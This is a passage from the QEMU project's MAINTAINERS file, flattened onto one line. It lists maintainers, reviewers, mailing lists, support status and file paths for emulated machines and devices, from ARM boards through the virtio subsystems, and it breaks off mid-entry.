hw/input/pl050.c F: hw/intc/pl190.c F: hw/sd/pl181.c F: hw/ssi/pl022.c F: include/hw/ssi/pl022.h F: hw/rtc/pl031.c F: include/hw/rtc/pl031.h F: include/hw/arm/primecell.h F: hw/timer/cmsdk-apb-timer.c F: include/hw/timer/cmsdk-apb-timer.h F: hw/timer/cmsdk-apb-dualtimer.c F: include/hw/timer/cmsdk-apb-dualtimer.h F: hw/char/cmsdk-apb-uart.c F: include/hw/char/cmsdk-apb-uart.h F: hw/watchdog/cmsdk-apb-watchdog.c F: include/hw/watchdog/cmsdk-apb-watchdog.h F: hw/misc/tz-ppc.c F: include/hw/misc/tz-ppc.h F: hw/misc/tz-mpc.c F: include/hw/misc/tz-mpc.h F: hw/misc/tz-msc.c F: include/hw/misc/tz-msc.h ARM cores M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/intc/arm* F: hw/intc/gic_internal.h F: hw/misc/a9scu.c F: hw/misc/arm11scu.c F: hw/misc/arm_l2x0.c F: hw/timer/a9gtimer* F: hw/timer/arm* F: include/hw/arm/arm*.h F: include/hw/intc/arm* F: include/hw/misc/a9scu.h F: include/hw/misc/arm11scu.h F: include/hw/timer/a9gtimer.h F: include/hw/timer/arm_mptimer.h F: include/hw/timer/armv7m_systick.h F: tests/qtest/test-arm-mptimer.c Exynos M: Igor Mitsyanko <i.mitsyanko@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/*/exynos* F: include/hw/arm/exynos4210.h Calxeda Highbank M: Rob Herring <robh@kernel.org> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/highbank.c F: hw/net/xgmac.c Canon DIGIC M: Antony Pavlov <antonynpavlov@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: include/hw/arm/digic.h F: hw/*/digic* F: include/hw/*/digic* Goldfish RTC M: Anup Patel <anup.patel@wdc.com> M: Alistair Francis <Alistair.Francis@wdc.com> L: qemu-riscv@nongnu.org S: Maintained F: hw/rtc/goldfish_rtc.c F: include/hw/rtc/goldfish_rtc.h Gumstix M: Peter Maydell <peter.maydell@linaro.org> R: Philippe Mathieu-Daudé <f4bug@amsat.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/gumstix.c i.MX25 PDK M: Peter Maydell <peter.maydell@linaro.org> R: Jean-Christophe Dubois <jcd@tribudubois.net> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/fsl-imx25.c F: hw/arm/imx25_pdk.c F: hw/misc/imx25_ccm.c F: include/hw/arm/fsl-imx25.h F: include/hw/misc/imx25_ccm.h i.MX31 (kzm) M: Peter Chubb <peter.chubb@nicta.com.au> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/kzm.c F: hw/*/imx_* F: hw/*/*imx31* F: include/hw/*/imx_* F: include/hw/*/*imx31* Integrator CP M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/integratorcp.c F: hw/misc/arm_integrator_debug.c F: include/hw/misc/arm_integrator_debug.h F: tests/acceptance/machine_arm_integratorcp.py F: docs/system/arm/integratorcp.rst MCIMX6UL EVK / i.MX6ul M: Peter Maydell <peter.maydell@linaro.org> R: Jean-Christophe Dubois <jcd@tribudubois.net> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/mcimx6ul-evk.c F: hw/arm/fsl-imx6ul.c F: hw/misc/imx6ul_ccm.c F: include/hw/arm/fsl-imx6ul.h F: include/hw/misc/imx6ul_ccm.h MCIMX7D SABRE / i.MX7 M: Peter Maydell <peter.maydell@linaro.org> R: Andrey Smirnov <andrew.smirnov@gmail.com> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/mcimx7d-sabre.c F: hw/arm/fsl-imx7.c F: hw/misc/imx7_*.c F: include/hw/arm/fsl-imx7.h F: include/hw/misc/imx7_*.h F: hw/pci-host/designware.c F: include/hw/pci-host/designware.h MPS2 M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/mps2.c F: hw/arm/mps2-tz.c F: hw/misc/mps2-*.c F: include/hw/misc/mps2-*.h F: hw/arm/armsse.c F: include/hw/arm/armsse.h F: hw/misc/iotkit-secctl.c F: include/hw/misc/iotkit-secctl.h F: hw/misc/iotkit-sysctl.c F: include/hw/misc/iotkit-sysctl.h F: hw/misc/iotkit-sysinfo.c F: include/hw/misc/iotkit-sysinfo.h F: hw/misc/armsse-cpuid.c F: include/hw/misc/armsse-cpuid.h F: hw/misc/armsse-mhu.c F: include/hw/misc/armsse-mhu.h Musca M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/musca.c Musicpal M: Jan Kiszka <jan.kiszka@web.de> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/musicpal.c F: docs/system/arm/musicpal.rst nSeries M: Andrzej Zaborowski <balrogg@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/nseries.c F: hw/display/blizzard.c F: hw/input/lm832x.c F: hw/input/tsc2005.c F: hw/misc/cbus.c F: hw/rtc/twl92230.c F: include/hw/display/blizzard.h F: include/hw/input/tsc2xxx.h F: include/hw/misc/cbus.h F: tests/acceptance/machine_arm_n8x0.py F: docs/system/arm/nseries.rst Palm M: Andrzej Zaborowski <balrogg@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/palm.c F: hw/input/tsc210x.c F: include/hw/input/tsc2xxx.h F: docs/system/arm/palm.rst Raspberry Pi M: Peter Maydell <peter.maydell@linaro.org> R: Andrew Baumann <Andrew.Baumann@microsoft.com> R: Philippe Mathieu-Daudé <f4bug@amsat.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/raspi.c F: hw/arm/raspi_platform.h F: hw/*/bcm283* F: include/hw/arm/raspi* F: include/hw/*/bcm283* Real View M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/realview* F: hw/cpu/realview_mpcore.c F: hw/intc/realview_gic.c F: include/hw/intc/realview_gic.h F: docs/system/arm/realview.rst PXA2XX M: Andrzej Zaborowski <balrogg@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/mainstone.c F: hw/arm/spitz.c F: hw/arm/tosa.c F: hw/arm/z2.c F: hw/*/pxa2xx* F: hw/display/tc6393xb.c F: hw/gpio/max7310.c F: hw/gpio/zaurus.c F: hw/misc/mst_fpga.c F: hw/misc/max111x.c F: include/hw/arm/pxa.h F: include/hw/arm/sharpsl.h F: include/hw/display/tc6393xb.h F: docs/system/arm/xscale.rst SABRELITE / i.MX6 M: Peter Maydell <peter.maydell@linaro.org> R: Jean-Christophe Dubois <jcd@tribudubois.net> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/sabrelite.c F: hw/arm/fsl-imx6.c F: hw/misc/imx6_*.c F: hw/ssi/imx_spi.c F: hw/usb/imx-usb-phy.c F: include/hw/usb/imx-usb-phy.h F: include/hw/arm/fsl-imx6.h F: include/hw/misc/imx6_*.h F: include/hw/ssi/imx_spi.h SBSA-REF M: Radoslaw Biernacki <radoslaw.biernacki@linaro.org> M: Peter Maydell <peter.maydell@linaro.org> R: Leif Lindholm <leif@nuviainc.com> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/sbsa-ref.c Sharp SL-5500 (Collie) PDA M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Odd Fixes F: hw/arm/collie.c F: hw/arm/strongarm* Stellaris M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/*/stellaris* F: include/hw/input/gamepad.h F: docs/system/arm/stellaris.rst Versatile Express M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/vexpress.c Versatile PB M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/*/versatile* F: hw/misc/arm_sysctl.c F: docs/system/arm/versatile.rst Virt M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/virt* F: include/hw/arm/virt.h Xilinx Zynq M: Edgar E. Iglesias <edgar.iglesias@gmail.com> M: Alistair Francis <alistair@alistair23.me> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/*/xilinx_* F: hw/*/cadence_* F: hw/misc/zynq* F: include/hw/misc/zynq* X: hw/ssi/xilinx_* Xilinx ZynqMP M: Alistair Francis <alistair@alistair23.me> M: Edgar E. Iglesias <edgar.iglesias@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/*/xlnx*.c F: include/hw/*/xlnx*.h F: include/hw/ssi/xilinx_spips.h F: hw/display/dpcd.c F: include/hw/display/dpcd.h ARM ACPI Subsystem M: Shannon Zhao <shannon.zhaosl@gmail.com> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/virt-acpi-build.c STM32F205 M: Alistair Francis <alistair@alistair23.me> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/stm32f205_soc.c F: hw/misc/stm32f2xx_syscfg.c F: hw/char/stm32f2xx_usart.c F: hw/timer/stm32f2xx_timer.c F: hw/adc/* F: hw/ssi/stm32f2xx_spi.c F: include/hw/*/stm32*.h STM32F405 M: Alistair Francis <alistair@alistair23.me> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/stm32f405_soc.c F: hw/misc/stm32f4xx_syscfg.c F: hw/misc/stm32f4xx_exti.c Netduino 2 M: Alistair Francis <alistair@alistair23.me> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/netduino2.c Netduino Plus 2 M: Alistair Francis <alistair@alistair23.me> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/netduinoplus2.c SmartFusion2 M: Subbaraya Sundeep <sundeep.lkml@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/msf2-soc.c F: hw/misc/msf2-sysreg.c F: hw/timer/mss-timer.c F: hw/ssi/mss-spi.c F: include/hw/arm/msf2-soc.h F: include/hw/misc/msf2-sysreg.h F: include/hw/timer/mss-timer.h F: include/hw/ssi/mss-spi.h Emcraft M2S-FG484 M: Subbaraya Sundeep <sundeep.lkml@gmail.com> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/arm/msf2-som.c ASPEED BMCs M: Cédric Le Goater <clg@kaod.org> M: Peter Maydell <peter.maydell@linaro.org> R: Andrew Jeffery <andrew@aj.id.au> R: Joel Stanley <joel@jms.id.au> L: qemu-arm@nongnu.org S: Maintained F: hw/*/*aspeed* F: hw/misc/pca9552.c F: include/hw/*/*aspeed* F: include/hw/misc/pca9552*.h F: hw/net/ftgmac100.c F: include/hw/net/ftgmac100.h NRF51 M: Joel Stanley <joel@jms.id.au> M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/*/nrf51*.c F: hw/*/microbit*.c F: include/hw/*/nrf51*.h F: include/hw/*/microbit*.h F: tests/qtest/microbit-test.c CRIS Machines ------------- Axis Dev88 M: Edgar E. Iglesias <edgar.iglesias@gmail.com> S: Maintained F: hw/cris/axis_dev88.c F: hw/*/etraxfs_*.c HP-PARISC Machines ------------------ HP B160L M: Richard Henderson <rth@twiddle.net> R: Helge Deller <deller@gmx.de> S: Odd Fixes F: default-configs/hppa-softmmu.mak F: hw/hppa/ F: pc-bios/hppa-firmware.img LM32 Machines ------------- EVR32 and uclinux BSP M: Michael Walle <michael@walle.cc> S: Maintained F: hw/lm32/lm32_boards.c milkymist M: Michael Walle <michael@walle.cc> S: Maintained F: hw/lm32/milkymist.c M68K Machines ------------- an5206 M: Thomas Huth <huth@tuxfamily.org> S: Odd Fixes F: hw/m68k/an5206.c F: hw/m68k/mcf5206.c mcf5208 M: Thomas Huth <huth@tuxfamily.org> S: Odd Fixes F: hw/m68k/mcf5208.c F: hw/m68k/mcf_intc.c F: hw/char/mcf_uart.c F: hw/net/mcf_fec.c F: include/hw/m68k/mcf*.h NeXTcube M: Thomas Huth <huth@tuxfamily.org> S: Odd Fixes F: hw/m68k/next-*.c F: hw/display/next-fb.c F: include/hw/m68k/next-cube.h q800 M: Laurent Vivier <laurent@vivier.eu> S: Maintained F: hw/m68k/q800.c F: hw/misc/mac_via.c F: hw/nubus/* F: hw/display/macfb.c F: hw/block/swim.c F: hw/m68k/bootinfo.h F: include/hw/misc/mac_via.h F: include/hw/nubus/* F: include/hw/display/macfb.h F: include/hw/block/swim.h MicroBlaze Machines ------------------- petalogix_s3adsp1800 M: Edgar E. Iglesias <edgar.iglesias@gmail.com> S: Maintained F: hw/microblaze/petalogix_s3adsp1800_mmu.c F: include/hw/char/xilinx_uartlite.h petalogix_ml605 M: Edgar E. Iglesias <edgar.iglesias@gmail.com> S: Maintained F: hw/microblaze/petalogix_ml605_mmu.c MIPS Machines ------------- Jazz M: Hervé Poussineau <hpoussin@reactos.org> R: Aleksandar Rikalo <aleksandar.rikalo@rt-rk.com> S: Maintained F: hw/mips/mips_jazz.c F: hw/display/jazz_led.c F: hw/dma/rc4030.c Malta M: Aleksandar Markovic <aleksandar.qemu.devel@gmail.com> M: Philippe Mathieu-Daudé <f4bug@amsat.org> R: Aurelien Jarno <aurelien@aurel32.net> S: Maintained F: hw/isa/piix4.c F: hw/acpi/piix4.c F: hw/mips/mips_malta.c F: hw/mips/gt64xxx_pci.c F: include/hw/southbridge/piix.h F: tests/acceptance/linux_ssh_mips_malta.py F: tests/acceptance/machine_mips_malta.py Mipssim M: Aleksandar Markovic <aleksandar.qemu.devel@gmail.com> R: Aleksandar Rikalo <aleksandar.rikalo@rt-rk.com> S: Odd Fixes F: hw/mips/mips_mipssim.c F: hw/net/mipsnet.c R4000 M: Aleksandar Markovic <aleksandar.qemu.devel@gmail.com> R: Aurelien Jarno <aurelien@aurel32.net> R: Aleksandar Rikalo <aleksandar.rikalo@rt-rk.com> S: Obsolete F: hw/mips/mips_r4k.c Fulong 2E M: Philippe Mathieu-Daudé <f4bug@amsat.org> M: Aleksandar Markovic <aleksandar.qemu.devel@gmail.com> S: Odd Fixes F: hw/mips/mips_fulong2e.c F: hw/isa/vt82c686.c F: hw/pci-host/bonito.c F: include/hw/isa/vt82c686.h Boston M: Paul Burton <pburton@wavecomp.com> R: Aleksandar Rikalo <aleksandar.rikalo@rt-rk.com> S: Maintained F: hw/core/loader-fit.c F: hw/mips/boston.c F: hw/pci-host/xilinx-pcie.c F: include/hw/pci-host/xilinx-pcie.h OpenRISC Machines ----------------- or1k-sim M: Jia Liu <proljc@gmail.com> S: Maintained F: hw/openrisc/openrisc_sim.c PowerPC Machines ---------------- 405 M: David Gibson <david@gibson.dropbear.id.au> L: qemu-ppc@nongnu.org S: Odd Fixes F: hw/ppc/ppc405_boards.c Bamboo M: David Gibson <david@gibson.dropbear.id.au> L: qemu-ppc@nongnu.org S: Odd Fixes F: hw/ppc/ppc440_bamboo.c e500 M: David Gibson <david@gibson.dropbear.id.au> L: qemu-ppc@nongnu.org S: Odd Fixes F: hw/ppc/e500* F: hw/gpio/mpc8xxx.c F: hw/i2c/mpc_i2c.c F: hw/net/fsl_etsec/ F: hw/pci-host/ppce500.c F: include/hw/ppc/ppc_e500.h F: include/hw/pci-host/ppce500.h F: pc-bios/u-boot.e500 mpc8544ds M: David Gibson <david@gibson.dropbear.id.au> L: qemu-ppc@nongnu.org S: Odd Fixes F: hw/ppc/mpc8544ds.c F: hw/ppc/mpc8544_guts.c New World (mac99) M: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk> R: David Gibson <david@gibson.dropbear.id.au> L: qemu-ppc@nongnu.org S: Odd Fixes F: hw/ppc/mac_newworld.c F: hw/pci-host/uninorth.c F: hw/pci-bridge/dec.[hc] F: hw/misc/macio/ F: hw/misc/mos6522.c F: hw/nvram/mac_nvram.c F: hw/input/adb* F: include/hw/misc/macio/ F: include/hw/misc/mos6522.h F: include/hw/ppc/mac_dbdma.h F: include/hw/pci-host/uninorth.h F: include/hw/input/adb* F: pc-bios/qemu_vga.ndrv Old World (g3beige) M: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk> R: David Gibson <david@gibson.dropbear.id.au> L: qemu-ppc@nongnu.org S: Odd Fixes F: hw/ppc/mac_oldworld.c F: hw/pci-host/grackle.c F: hw/misc/macio/ F: hw/intc/heathrow_pic.c F: hw/input/adb* F: include/hw/intc/heathrow_pic.h F: include/hw/input/adb* F: pc-bios/qemu_vga.ndrv PReP M: Hervé Poussineau <hpoussin@reactos.org> L: qemu-ppc@nongnu.org S: Maintained F: hw/ppc/prep.c F: hw/ppc/prep_systemio.c F: hw/ppc/rs6000_mc.c F: hw/pci-host/prep.[hc] F: hw/isa/i82378.c F: hw/isa/pc87312.c F: hw/dma/i82374.c F: hw/rtc/m48t59-isa.c F: include/hw/isa/pc87312.h F: include/hw/rtc/m48t59.h F: tests/acceptance/ppc_prep_40p.py sPAPR M: David Gibson <david@gibson.dropbear.id.au> L: qemu-ppc@nongnu.org S: Supported F: hw/*/spapr* F: include/hw/*/spapr* F: hw/*/xics* F: include/hw/*/xics* F: pc-bios/slof.bin F: docs/specs/ppc-spapr-hcalls.txt F: docs/specs/ppc-spapr-hotplug.txt F: tests/qtest/spapr* F: tests/qtest/libqos/*spapr* F: tests/qtest/rtas* F: tests/qtest/libqos/rtas* PowerNV (Non-Virtualized) M: Cédric Le Goater <clg@kaod.org> M: David Gibson <david@gibson.dropbear.id.au> L: qemu-ppc@nongnu.org S: Maintained F: hw/ppc/pnv* F: hw/intc/pnv* F: hw/intc/xics_pnv.c F: include/hw/ppc/pnv* F: pc-bios/skiboot.lid F: tests/qtest/pnv* virtex_ml507 M: Edgar E. Iglesias <edgar.iglesias@gmail.com> L: qemu-ppc@nongnu.org S: Odd Fixes F: hw/ppc/virtex_ml507.c sam460ex M: BALATON Zoltan <balaton@eik.bme.hu> L: qemu-ppc@nongnu.org S: Maintained F: hw/ppc/sam460ex.c F: hw/ppc/ppc440_pcix.c F: hw/display/sm501* F: hw/ide/sii3112.c F: hw/rtc/m41t80.c F: pc-bios/canyonlands.dt[sb] F: pc-bios/u-boot-sam460ex-20100605.bin F: roms/u-boot-sam460ex SH4 Machines ------------ R2D M: Magnus Damm <magnus.damm@gmail.com> S: Maintained F: hw/sh4/r2d.c F: hw/intc/sh_intc.c F: hw/timer/sh_timer.c Shix M: Magnus Damm <magnus.damm@gmail.com> S: Odd Fixes F: hw/sh4/shix.c SPARC Machines -------------- Sun4m M: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk> S: Maintained F: hw/sparc/sun4m.c F: hw/sparc/sun4m_iommu.c F: hw/display/cg3.c F: hw/display/tcx.c F: hw/dma/sparc32_dma.c F: hw/misc/eccmemctl.c F: hw/*/slavio_*.c F: include/hw/nvram/sun_nvram.h F: include/hw/sparc/sparc32_dma.h F: include/hw/sparc/sun4m_iommu.h F: pc-bios/openbios-sparc32 Sun4u M: Mark Cave-Ayland <mark.cave-ayland@ilande.co.uk> S: Maintained F: hw/sparc64/sun4u.c F: hw/sparc64/sun4u_iommu.c F: include/hw/sparc/sun4u_iommu.h F: hw/pci-host/sabre.c F: include/hw/pci-host/sabre.h F: hw/pci-bridge/simba.c F: include/hw/pci-bridge/simba.h F: pc-bios/openbios-sparc64 Sun4v M: Artyom Tarasenko <atar4qemu@gmail.com> S: Maintained F: hw/sparc64/niagara.c F: hw/rtc/sun4v-rtc.c F: include/hw/rtc/sun4v-rtc.h Leon3 M: Fabien Chouteau <chouteau@adacore.com> M: KONRAD Frederic <frederic.konrad@adacore.com> S: Maintained F: hw/sparc/leon3.c F: hw/*/grlib* F: include/hw/*/grlib* F: tests/acceptance/machine_sparc_leon3.py S390 Machines ------------- S390 Virtio-ccw M: Cornelia Huck <cohuck@redhat.com> M: Halil Pasic <pasic@linux.ibm.com> M: Christian Borntraeger <borntraeger@de.ibm.com> S: Supported F: hw/char/sclp*.[hc] F: hw/char/terminal3270.c F: hw/s390x/ F: include/hw/s390x/ F: hw/watchdog/wdt_diag288.c F: include/hw/watchdog/wdt_diag288.h F: default-configs/s390x-softmmu.mak T: git https://github.com/cohuck/qemu.git s390-next T: git https://github.com/borntraeger/qemu.git s390-next L: qemu-s390x@nongnu.org S390-ccw boot M: Christian Borntraeger <borntraeger@de.ibm.com> M: Thomas Huth <thuth@redhat.com> S: Supported F: hw/s390x/ipl.* F: pc-bios/s390-ccw/ F: pc-bios/s390-ccw.img F: docs/devel/s390-dasd-ipl.rst T: git https://github.com/borntraeger/qemu.git s390-next L: qemu-s390x@nongnu.org S390 PCI M: Matthew Rosato <mjrosato@linux.ibm.com> S: Supported F: hw/s390x/s390-pci* L: qemu-s390x@nongnu.org UniCore32 Machines ------------------ PKUnity-3 SoC initramfs-with-busybox M: Guan Xuetao <gxt@mprc.pku.edu.cn> S: Maintained F: hw/*/puv3* F: hw/unicore32/ X86 Machines ------------ PC M: Michael S. Tsirkin <mst@redhat.com> M: Marcel Apfelbaum <marcel.apfelbaum@gmail.com> S: Supported F: include/hw/i386/ F: hw/i386/ F: hw/pci-host/i440fx.c F: hw/pci-host/q35.c F: hw/pci-host/pam.c F: include/hw/pci-host/i440fx.h F: include/hw/pci-host/q35.h F: include/hw/pci-host/pam.h F: hw/isa/piix3.c F: hw/isa/lpc_ich9.c F: hw/i2c/smbus_ich9.c F: hw/acpi/piix4.c F: hw/acpi/ich9.c F: include/hw/acpi/ich9.h F: include/hw/southbridge/piix.h F: hw/misc/sga.c F: hw/isa/apm.c F: include/hw/isa/apm.h F: tests/test-x86-cpuid.c F: tests/qtest/test-x86-cpuid-compat.c PC Chipset M: Michael S. Tsirkin <mst@redhat.com> M: Paolo Bonzini <pbonzini@redhat.com> S: Supported F: hw/char/debugcon.c F: hw/char/parallel* F: hw/char/serial* F: hw/dma/i8257* F: hw/i2c/pm_smbus.c F: hw/input/pckbd.c F: hw/intc/apic* F: hw/intc/ioapic* F: hw/intc/i8259* F: hw/isa/isa-superio.c F: hw/misc/debugexit.c F: hw/misc/pc-testdev.c F: hw/timer/hpet* F: hw/timer/i8254* F: hw/rtc/mc146818rtc* F: hw/watchdog/wdt_ib700.c F: hw/watchdog/wdt_i6300esb.c F: include/hw/display/vga.h F: include/hw/char/parallel.h F: include/hw/dma/i8257.h F: include/hw/i2c/pm_smbus.h F: include/hw/input/i8042.h F: include/hw/isa/i8259_internal.h F: include/hw/isa/superio.h F: include/hw/timer/hpet.h F: include/hw/timer/i8254* F: include/hw/rtc/mc146818rtc* microvm M: Sergio Lopez <slp@redhat.com> M: Paolo Bonzini <pbonzini@redhat.com> S: Maintained F: docs/microvm.rst F: hw/i386/microvm.c F: include/hw/i386/microvm.h F: pc-bios/bios-microvm.bin Machine core M: Eduardo Habkost <ehabkost@redhat.com> M: Marcel Apfelbaum <marcel.apfelbaum@gmail.com> S: Supported F: hw/core/cpu.c F: hw/core/machine-qmp-cmds.c F: hw/core/machine.c F: hw/core/null-machine.c F: hw/core/numa.c F: hw/cpu/cluster.c F: qapi/machine.json F: qapi/machine-target.json F: include/hw/boards.h F: include/hw/core/cpu.h F: include/hw/cpu/cluster.h F: include/sysemu/numa.h T: git https://github.com/ehabkost/qemu.git machine-next Xtensa Machines --------------- sim M: Max Filippov <jcmvbkbc@gmail.com> S: Maintained F: hw/xtensa/sim.c virt M: Max Filippov <jcmvbkbc@gmail.com> S: Maintained F: hw/xtensa/virt.c XTFPGA (LX60, LX200, ML605, KC705) M: Max Filippov <jcmvbkbc@gmail.com> S: Maintained F: hw/xtensa/xtfpga.c F: hw/net/opencores_eth.c Devices ------- EDU M: Jiri Slaby <jslaby@suse.cz> S: Maintained F: hw/misc/edu.c IDE M: John Snow <jsnow@redhat.com> L: qemu-block@nongnu.org S: Supported F: include/hw/ide.h F: include/hw/ide/ F: hw/ide/ F: hw/block/block.c F: hw/block/cdrom.c F: hw/block/hd-geometry.c F: tests/qtest/ide-test.c F: tests/qtest/ahci-test.c F: tests/qtest/cdrom-test.c F: tests/qtest/libqos/ahci* T: git https://github.com/jnsnow/qemu.git ide IPMI M: Corey Minyard <minyard@acm.org> S: Maintained F: include/hw/ipmi/* F: hw/ipmi/* F: hw/smbios/smbios_type_38.c F: tests/qtest/ipmi* T: git https://github.com/cminyard/qemu.git master-ipmi-rebase Floppy M: John Snow <jsnow@redhat.com> L: qemu-block@nongnu.org S: Supported F: hw/block/fdc.c F: include/hw/block/fdc.h F: tests/qtest/fdc-test.c T: git https://github.com/jnsnow/qemu.git ide OMAP M: Peter Maydell <peter.maydell@linaro.org> L: qemu-arm@nongnu.org S: Maintained F: hw/*/omap* F: include/hw/arm/omap.h IPack M: Alberto Garcia <berto@igalia.com> S: Odd Fixes F: hw/char/ipoctal232.c F: hw/ipack/ PCI M: Michael S. Tsirkin <mst@redhat.com> M: Marcel Apfelbaum <marcel.apfelbaum@gmail.com> S: Supported F: include/hw/pci/* F: hw/misc/pci-testdev.c F: hw/pci/* F: hw/pci-bridge/* F: docs/pci* F: docs/specs/*pci* F: default-configs/pci.mak ACPI/SMBIOS M: Michael S. Tsirkin <mst@redhat.com> M: Igor Mammedov <imammedo@redhat.com> S: Supported F: include/hw/acpi/* F: include/hw/firmware/smbios.h F: hw/mem/* F: hw/acpi/* F: hw/smbios/* F: hw/i386/acpi-build.[hc] F: hw/arm/virt-acpi-build.c F: tests/qtest/bios-tables-test.c F: tests/qtest/acpi-utils.[hc] F: tests/data/acpi/ ppc4xx M: David Gibson <david@gibson.dropbear.id.au> L: qemu-ppc@nongnu.org S: Odd Fixes F: hw/ppc/ppc4*.c F: hw/i2c/ppc4xx_i2c.c F: include/hw/ppc/ppc4xx.h F: include/hw/i2c/ppc4xx_i2c.h Character devices M: Marc-André Lureau <marcandre.lureau@redhat.com> R: Paolo Bonzini <pbonzini@redhat.com> S: Odd Fixes F: hw/char/ Network devices M: Jason Wang <jasowang@redhat.com> S: Odd Fixes F: hw/net/ F: include/hw/net/ F: tests/qtest/virtio-net-test.c F: docs/virtio-net-failover.rst T: git https://github.com/jasowang/qemu.git net Parallel NOR Flash devices M: Philippe Mathieu-Daudé <philmd@redhat.com> T: git https://gitlab.com/philmd/qemu.git pflash-next S: Maintained F: hw/block/pflash_cfi*.c F: include/hw/block/flash.h SCSI M: Paolo Bonzini <pbonzini@redhat.com> R: Fam Zheng <fam@euphon.net> S: Supported F: include/hw/scsi/* F: hw/scsi/* F: tests/qtest/virtio-scsi-test.c T: git https://github.com/bonzini/qemu.git scsi-next SSI M: Alistair Francis <alistair@alistair23.me> S: Maintained F: hw/ssi/* F: hw/block/m25p80.c F: include/hw/ssi/ssi.h X: hw/ssi/xilinx_* F: tests/qtest/m25p80-test.c Xilinx SPI M: Alistair Francis <alistair@alistair23.me> S: Maintained F: hw/ssi/xilinx_* SD (Secure Card) M: Philippe Mathieu-Daudé <f4bug@amsat.org> S: Odd Fixes F: include/hw/sd/sd* F: hw/sd/core.c F: hw/sd/sd* F: hw/sd/ssi-sd.c F: tests/qtest/sd* USB M: Gerd Hoffmann <kraxel@redhat.com> S: Maintained F: hw/usb/* F: tests/qtest/usb-*-test.c F: docs/usb2.txt F: docs/usb-storage.txt F: include/hw/usb.h F: include/hw/usb/ F: default-configs/usb.mak USB (serial adapter) M: Gerd Hoffmann <kraxel@redhat.com> M: Samuel Thibault <samuel.thibault@ens-lyon.org> S: Maintained F: hw/usb/dev-serial.c VFIO M: Alex Williamson <alex.williamson@redhat.com> S: Supported F: hw/vfio/* F: include/hw/vfio/ vfio-ccw M: Cornelia Huck <cohuck@redhat.com> M: Eric Farman <farman@linux.ibm.com> S: Supported F: hw/vfio/ccw.c F: hw/s390x/s390-ccw.c F: include/hw/s390x/s390-ccw.h F: include/hw/s390x/vfio-ccw.h T: git https://github.com/cohuck/qemu.git s390-next L: qemu-s390x@nongnu.org vfio-ap M: Christian Borntraeger <borntraeger@de.ibm.com> M: Tony Krowiak <akrowiak@linux.ibm.com> M: Halil Pasic <pasic@linux.ibm.com> M: Pierre Morel <pmorel@linux.ibm.com> S: Supported F: hw/s390x/ap-device.c F: hw/s390x/ap-bridge.c F: include/hw/s390x/ap-device.h F: include/hw/s390x/ap-bridge.h F: hw/vfio/ap.c F: docs/system/s390x/vfio-ap.rst L: qemu-s390x@nongnu.org vhost M: Michael S. Tsirkin <mst@redhat.com> S: Supported F: hw/*/*vhost* F: docs/interop/vhost-user.json F: docs/interop/vhost-user.rst F: contrib/vhost-user-*/ F: backends/vhost-user.c F: include/sysemu/vhost-user-backend.h virtio M: Michael S. Tsirkin <mst@redhat.com> S: Supported F: hw/*/virtio* F: hw/virtio/Makefile.objs F: hw/virtio/trace-events F: net/vhost-user.c F: include/hw/virtio/ virtio-balloon M: Michael S. Tsirkin <mst@redhat.com> M: David Hildenbrand <david@redhat.com> S: Maintained F: hw/virtio/virtio-balloon*.c F: include/hw/virtio/virtio-balloon.h F: balloon.c F: include/sysemu/balloon.h virtio-9p M: Greg Kurz 